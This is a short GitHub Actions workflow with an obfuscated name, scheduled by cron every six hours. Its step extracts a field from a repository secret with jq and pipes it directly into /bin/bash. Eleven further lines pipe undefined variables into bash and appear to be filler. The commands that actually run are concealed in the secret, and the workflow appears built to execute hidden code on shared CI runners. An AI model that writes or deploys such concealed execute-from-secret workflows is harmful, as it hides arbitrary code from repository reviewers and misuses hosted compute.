name: caozhang19870101
on:
  workflow_dispatch:
  schedule:
    - cron: '16 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caozhang19870101
        env:
          iygdo42: ${{ secrets.iygdo42 }}
        run: |
          echo $iygdo42 | jq -r .t9 | /bin/bash
          echo $uddz5 | jq -r .r5 | /bin/bash
          echo $pay706 | jq -r .u733 | /bin/bash
          echo $l6807 | jq -r .isx146 | /bin/bash
          echo $zxzs340 | jq -r .fkh877 | /bin/bash
          echo $us7 | jq -r .srwpq5 | /bin/bash
          echo $usvg9757 | jq -r .fxist18809 | /bin/bash
          echo $a7 | jq -r .yoph10590 | /bin/bash
          echo $ih2984 | jq -r .fjs965 | /bin/bash
          echo $ul49936 | jq -r .qlg819 | /bin/bash
          echo $zo377 | jq -r .olqdo2 | /bin/bash
          echo $gbqc31711 | jq -r .kq0 | /bin/bash

